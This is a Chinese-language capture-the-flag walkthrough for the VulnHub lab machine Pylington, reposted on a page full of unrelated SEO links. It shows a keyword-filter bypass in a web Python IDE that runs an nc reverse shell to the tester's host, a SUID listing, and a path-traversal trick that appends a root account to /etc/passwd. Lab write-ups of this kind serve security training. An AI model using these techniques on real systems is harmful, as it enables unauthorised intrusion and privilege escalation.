当前位置: 首页 > news >正文

文山州建设局网站十大少儿编程教育品牌

文山州建设局网站,十大少儿编程教育品牌,论某网站职能建设,软件商店2023靶机下载地址 Pylington: 1 ~ VulnHub kali ip:192.168.174.128 靶机ip:192.168.174.146 arp-scan -l发现靶机ip是192.168.174.146 进行靶机的端口扫描,这里使用的是nmap的gui 可以发现开放了21和80端口,80端口扫描到了robot…

靶机下载地址

Pylington: 1 ~ VulnHub

kali ip:192.168.174.128

靶机ip:192.168.174.146

arp-scan -l发现靶机ip是192.168.174.146

进行靶机的端口扫描,这里使用的是nmap的gui

可以发现开放了21和80端口,80端口扫描到了robots里面的三个目录

再使用dirsearch进行目录扫描

在robots目录中的目录看到了账号和密码

Username: steve

Password: bvbkukHAeVxtjjVH

再sign in进行登录

可以看到底下有链接,点击

这里进入了python ide的网页版界面

看到这里有保护机制,看一下代码

def check_if_safe(code: str) -> bool:if 'import' in code: # import is too dangerousreturn Falseelif 'os' in code: # os is too dangerousreturn Falseelif 'open' in code: # opening files is also too dangerousreturn Falseelse:return True

可以看到不能出现import,os,open

这里尝试进行绕过

str1="impor"+"t o"+"s"str2="o"+"s.system('nc 192.168.174.128 4444 -e /bin/bash')"exec(str1)exec(str2)

os.system执行的是nc进行反弹shell,主动连接我们的kali的4444端口,同时我们的kali开启nc进行监听4444端口

nc -nlvp 4444

成功接收到shell,修改交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

查看具有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

这里看到typing命令,执行。

输入一样的代码,得到密码

54ezhCGaJV

成功切换到py用户

使用得到的密码也可以进行py用户的ssh登录

再次查看具有suid权限的命令

得到脚本

py@archlinux secret_stuff]$ cat backup.cc#include <iostream>#include <string>#include <fstream>int main(){std::cout<<"Enter a line of text to back up: ";std::string line;std::getline(std::cin,line);std::string path;std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";std::getline(std::cin,path);if(!path.starts_with("/srv/backups/")){std::cout<<"The file must be inside the /srv/backups directory!\n";}else{std::ofstream backup_file(path,std::ios_base::app);backup_file<<line<<'\n';}return 0;}

大概的意思就是进行文件的备份,但是目录只能是/srv/backup目录下,这里使用../可以进行切换目录,尝试对/etc/passwd文件进行追加一个具有root权限的用户。

使用openssl进行生成账号密码

修改成passwd的格式,(套用第一行root的格式即可,把x处修改成生成的加盐密码),目录是/srv/backups/../../etc/passwd

这里切换到yyy用户,id查看已经是root权限了

查看root目录

http://www.ds6.com.cn/news/81759.html

相关文章:

  • 雍熙网站建设百度快速排名工具
  • 国家高新技术企业认定有什么用杭州网站优化
  • 什么专业是做网站北京网站优化效果
  • 株洲网站制作公司sem扫描电镜
  • 郧阳网站建设官网seo哪家公司好
  • 建设赌博网站seo矩阵培训
  • ps怎么做网站首页网站做优化
  • 宁波专业网站定制制作服务如何用模板做网站
  • 做网站公司多少钱免费推广网站大全集合
  • 公司网站哪家做的好大数据营销系统
  • 绿色大气网站谷歌关键词排名查询工具
  • 上海网站建设 浦东产品营销推广方案
  • 海口网站建设推广seo建站公司
  • 网站建设公司业务培训网络营销一般月薪多少
  • 织梦怎么做企业网站谷歌seo推广招聘
  • 深圳制作广告宣传片制作宁波正规seo快速排名公司
  • 做网站比特币钱包今日热点事件
  • 上海哪家公司可以做网站广告关键词排名
  • 南宁微信网站制作营销策划书案例
  • 莱芜金点子广告电子版seo服务外包价格
  • wordpress换域名后图片路径不对潍坊seo推广
  • 代做网站转账截图南京seo公司教程
  • web网站开发用什么百度链接提交工具
  • 怎么将网站权重提上去淄博网站推广
  • vue手机网站开发网络广告营销方案策划内容
  • 做木箱的网站网络营销的含义
  • 网站开发建设培训市场调研报告包括哪些内容
  • 如何建设营销型网站100个商业经典案例
  • 深圳网站建设公司排行郑州seo代理外包公司
  • 怎么建立一个独立的网站南城网站优化公司